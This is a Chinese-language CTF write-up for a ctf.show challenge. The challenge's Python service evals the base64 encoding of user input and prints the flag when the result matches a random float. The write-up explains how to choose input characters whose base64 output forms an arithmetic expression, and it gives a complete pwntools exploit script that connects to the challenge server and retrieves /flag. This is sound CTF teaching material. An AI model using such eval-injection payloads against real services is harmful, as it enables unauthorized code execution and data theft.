题目:nc pwn.challenge.ctf.show 28006(端口会变)
运行命令后显示代码:
#!/usr/bin/env python3.8
from base64 import b64encode
from random import randint, random
from os import getcwd
print('\n\n')
print(open(getcwd() + '/' + __file__, 'r').read())
print('\n\n')
luck = randint(0, 2021) * random()
print(luck)
good = eval(b64encode(input().encode('utf-8')))
if abs(good - luck) < 1e-10:
print(open('/flag').read())
else:
print('Back luck 2021???')
20.511060023712336
分析题意,程序生成一个随机浮点数,用户输入的值的base64编码后的eval结果与这个浮点数的差要小于10的负10次方,就会输出flag。
考点在于构造输入值,搜索得知几个lucy值:
b64encode('㝿㝴')='452/4520'也就是0.1
b64encode('{M>')='e00+'
...
思路就是用这些已知的base64编码,根据程序给出的随机浮点数,构造一个字符串,该字符串base64编码后的结果为给定浮点数(到小数点后10位即可),然后发送给服务器就可以了:
import base64
import re
from pwn import *
table = {
'0.1/' : "㝿㝴",
'e00+': '{M>',
'e01+': '{M~',
'e04+': '{N>',
'e05+': '{N~',
'e08+': '{O>',
'e09+': '{O~',
'e10+': '{]>',
'e11+': '{]~',
'e013': '{Mw',
'e14+': '{^>',
'e15+': '{^~',
}
#host和端口根据环境修改
conn = remote("pwn.challenge.ctf.show", 28006)
while True:
data=conn.recvline(keepends=False)
res=re.search(r'^\d+\.\d+$',data.decode('ascii'))
if res:
# print(data)
break
s=data.decode('ascii')
print(s)
p=s.index('.')
d1=int(eval(s[0:p+2])*10)
d2=int(s[p+2:p+3])
d3=int(s[p+3:p+6])
d4=int(s[p+6:p+7])
d5=int(s[p+7:p+10])
d6=int(s[p+10:p+11])
payload = "0.1/e00+"*d1
payload += "0.1/e01+"*d2
payload += "0.1/e04+"*d3
payload += "0.1/e05+"*d4
payload += "0.1/e08+"*d5
payload += "0.1/e09+"*d6
payload += "0.1/e013"
#print(payload)
data = ""
for i in range(0, len(payload), 4):
data+=table[payload[i:i+4]]
#print(eval(base64.b64encode(data.encode('utf-8'))))
conn.sendline(data)
sleep(3)
print(conn.recvall())